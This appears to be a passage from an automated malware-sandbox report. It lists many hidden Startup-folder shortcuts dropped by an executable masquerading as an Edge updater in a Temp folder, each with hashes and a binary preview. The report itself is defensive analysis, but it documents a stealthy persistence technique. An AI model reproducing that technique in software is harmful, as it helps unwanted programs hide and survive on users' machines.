Preview:	L..................F...."............".U....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S............%S........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_29bc430ad8424be3a41e66ed515dc99c.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:18:29 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.92372701257409
Encrypted:	false
SSDEEP:	24:8ZyfHfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8EHfNDp2l9tJRBzfNZ47/yg
MD5:	8C685631C57B659219269D7EFEC41DD8
SHA1:	BBA99091E27F9095DEF5D346C836798E5DF39EE0
SHA-256:	080CA8CB12CB7BB9585D4CBE5FB6ED0319E595BFCB39C6FEC0967E0A7EF5043E
SHA-512:	C5D5A76C634BAEB8A1722FE2B16A1F550C630E035B535D524D6A0BCB0303AB196469BC17DDF7DCB55717D8E83046D2DCDD2AC4D8F997EC0BC9FA698691B3C521
Malicious:	false
Preview:	L..................F...."...........hdn'....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_2b3f065df93c4401905a03aa3de62b5b.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:18:00 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.920446569927478
Encrypted:	false
SSDEEP:	24:8ZOLHfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8ALHfNDp2l9tJRBzfNZ47/yg
MD5:	B182DE94E62306E8668C8B440A6A41FA
SHA1:	5B496FE82CBDB91489162CDB4726C76EFDE6AF8D
SHA-256:	0870FCE3CC276E700BB491EB38872AB8F3D7FAC2AFEF4624DDBFD9A7BEEC5D02
SHA-512:	970E9D501B4E96A5D2D1E4C8CA699D1315EF739753CCACD76D801D3D2AC9C387D7F206DA445BFAFA1FF681099C9F119B1F41DD35E911CC95E198EBA0EFEDF951
Malicious:	false
Preview:	L..................F...."...........p.:.....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_2c5ed3257a9c494aaa8a9b3a9d7bd542.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:19:23 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.923469953424358
Encrypted:	false
SSDEEP:	24:8ZFHVDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8zHVDp2l9tJRBzfNZ47/yg
MD5:	6CED0AFBC4BAA833D8359BF1F155EBDF
SHA1:	F8B87E15DB0E092DFB38A2BF343D1E7168028480
SHA-256:	A9621363F61CC5486BC1C5E8A1ACEAA6017D214AE721ACA891C46C01F673EEEA
SHA-512:	1027998472AEDD0EECF787C9701B26C28D1481420D841DDD0AA1AF82D4B3F1FFE71E6A656A2E105BB190FB42A4A8F9E5C49C2ECD61B685816AF116617CB6AB5C
Malicious:	false
Preview:	L..................F...."...........c..G....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........Z..G........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_2d3e067308c543f995db2c5843e9efb5.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:17:57 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.920666254439635
Encrypted:	false
SSDEEP:	24:8ZxHfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8rHfNDp2l9tJRBzfNZ47/yg
MD5:	8D604D9370A53105438B66A1F02E1EF6
SHA1:	ECBE951041B9E8AABBFC30B94D76977F814DE829
SHA-256:	836719BC8228702742C25DD12D9BFEE9793D5AA9EEC6253171AB6DAAC83C9274
SHA-512:	16B59640524A959BDC2E51A8A1327073347C7DE9CEDDB8A9FAD38F39C673861A485063B1E44FF8CA9356E11FF546EB76515B2A01D02D4A2DF04EEFA4646A3E65
Malicious:	false
Preview:	L..................F...."............mT.....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_2d4ce600d8f14273917139d8018be8d3.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:17:50 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.926871480239231
Encrypted:	false
SSDEEP:	24:8ZXHfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8RHfNDp2l9tJRBzfNZ47/yg
MD5:	68345FE23B7013813DAD298CECB35F42
SHA1:	2B54927425927DB1DB9505141C4E196BA6C420B2
SHA-256:	195B2E2E7834FDAD8F6CED7B6BAEB08FC544FC9FC570B25FF96E931CBC7B1085
SHA-512:	DACE24DF8303FE50BB626F54A65BDD05BE95B7DC08FC1C885306C1FF6B56C14A8A064692F9E002D713D7C490B1FA471A50F141D8474DB40D89673ED3AE020A4C
Malicious:	false
Preview:	L..................F...."...................0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_2d86e4edceea415eb423d83d970e086d.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:19:13 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.913122726382896
Encrypted:	false
SSDEEP:	24:8ZwqHWDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8CqHWDp2l9tJRBzfNZ47/yg
MD5:	0894E963F8F3D2391C9B02519F0DBB34
SHA1:	9FDFF07FAF9B92517DC2A4729FA744C55A90754A
SHA-256:	C3184133BBBF25931B3262501C6FD0C27A36654B5873E637E350BF71D824F3DC
SHA-512:	BE1681149CE455C2DA12C11E22BC5F0F0E9126F6284E8BECBD25729F8E3E2C3DFA17E64FD0F77DEE06D99CE78969D7075BF3B338488CD11B68EB1044EF7C1102
Malicious:	false
Preview:	L..................F...."...........4..A....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........4..A........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_2dcb319cf8274129a78b921238fe7cb3.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:18:13 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.922307487416048
Encrypted:	false
SSDEEP:	24:8ZPHfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8VHfNDp2l9tJRBzfNZ47/yg
MD5:	C803C8477E69923BD573907C6AE9B2E9
SHA1:	0942BAC97F830C28E42F4CE23D1126EB03C04D51
SHA-256:	8B75CA25A28CC325C82CE10AC748AA6FFA39EA6E7C407470FD73EA19B7942348
SHA-512:	5687A9253DCAA4837E43879D0C720C58B1DF84EECC8DEE8DBEC1F98C322C7638E87E9F36EBBEB6110F264A98F01C705203188D4ACF884280A5CDE8F1E4576DBB
Malicious:	false
Preview:	L..................F...."...........c$......0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_2f79f0adcf954e24a21fdda9ce0da31e.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:18:01 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.927915162131801
Encrypted:	false
SSDEEP:	24:8ZHLHfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8RLHfNDp2l9tJRBzfNZ47/yg
MD5:	F19135D9D30C0C92172322FD0118588D
SHA1:	204EE810456FA61B853DD087AD222E965457826B
SHA-256:	CFD102F4738356831933C9E9F35F08181F12E409C62E1F4D615CC3D6BC8DBC1B
SHA-512:	59E0190F2024AF8C3F41A59B6EB7E701B85E01016D4F896901C283FCFBE798AAF7FB85EF728972B46FAA88009D2AF25C0A3C9C90C908282CC574E374BA75118B
Malicious:	false
Preview:	L..................F...."............(......0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_32058ea4d4fa48949bcaf876cf454efa.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:18:54 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.921679614456703
Encrypted:	false
SSDEEP:	24:8ZdHfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8rHfNDp2l9tJRBzfNZ47/yg
MD5:	0AE47051ECAAAFECB0D717946F3EEED1
SHA1:	B59B158B9B0E27E14AA0A7F1AEB766AA382A7894
SHA-256:	A261456B90DB09932B5D14AE234C97C8154177CB37D61A3C6E38605CC3788477
SHA-512:	929AC56258B58B3E4A392F2EEFFECC746EBC97EFD98F79FD2AA3BE9370621C91F56195FC0DF4AA9E8AFD41091CB3C94982EC6E4BEE682E0526435543D078C13C
Malicious:	false
Preview:	L..................F...."............>\6....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_322055c8dd1d432b9ada39f6723b4851.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:19:30 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.922555141053893
Encrypted:	false
SSDEEP:	24:8ZBHICcDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8DHICcDp2l9tJRBzfNZ47/yg
MD5:	935793FC83DAFA3E255AF665C5C508CF
SHA1:	437A84C3549ACE4D2DAC6AED709A2E45E3FCC894
SHA-256:	1086BF8929E8C4857522FAA9973C843A03226D4456BB15924A95C4F05A9EFB42
SHA-512:	57BC9EEC6EF4C9C902F74907C754E050E236C31DF6689EF462B4227DA808EC01815D84D27B5BBF7CFF0A6677A14E287713E38BAF5B0E60550BFD6F4A7C8EA83D
Malicious:	false
Preview:	L..................F...."..............K....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S............,L........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_334d1e4253554d3d911b202da266b12b.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:18:59 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.9233883923257125
Encrypted:	false
SSDEEP:	24:8ZhH5Dp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8PH5Dp2l9tJRBzfNZ47/yg
MD5:	E2732792464C6916A12CFECD34B9BAA2
SHA1:	5565267BEC583CFDA4FEE77E2AE0C1BEFA966DAE
SHA-256:	C1375FCDD1A5D87A1833548BC0DD0F712CC6FC726CEE97E32F452D03714EE721
SHA-512:	0EBCE2D76E0E897B510E8E194E1D9440B46CE6AE7E09AF6DBDCB9575D45C5C5670D74F972F9F675463772B9DAFE10A88B4005464F0C192AB5DF24C8F75AC124D
Malicious:	false
Preview:	L..................F...."............1.9....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........\.{8........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_340cbc2e44fd4c878aa92e140d64a0f8.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:17:44 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.927163613974014
Encrypted:	false
SSDEEP:	24:8ZsHfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8uHfNDp2l9tJRBzfNZ47/yg
MD5:	F7980040A561C3391AC9E313D0291E01
SHA1:	6EBDD6CA19D9034BB707496239D4EC871A9EA8D9
SHA-256:	6D779324A8322BFC7AE07468FCFD74149788B2FBC78EB726B9381DC07EC14DA8
SHA-512:	058F5E1A31C4D514B98355A056DF5E62E220B53447C062194FE307D35881A82D480AFE0CF26CEB7F4F7E4309FA3750A91081721175578CC9210211963A92DDC4
Malicious:	false
Preview:	L..................F...."...........O.0.....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_3985638be9e1402f84ea1f5d23887334.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:19:40 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.9270739738856575
Encrypted:	false
SSDEEP:	24:8Z+HhHyDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8sBHyDp2l9tJRBzfNZ47/yg
MD5:	3A18CBF6561EF313B179D0C540B248B0
SHA1:	3ED37401B4C4AB0636CDB4BDEC0663BA9B5459C8
SHA-256:	02BB21AB7CF3325278814A88E2C46601DC83F3CFC64E01C4B9017734219B1DEF
SHA-512:	422BDE51BFA5331CB4085DA54E32D705965B166E0168868FE05E55C48401AAE8610076F3B5DE1AE955B29006C1BE9B82C844FA2D613EE25485A54D97E773DEB9
Malicious:	false
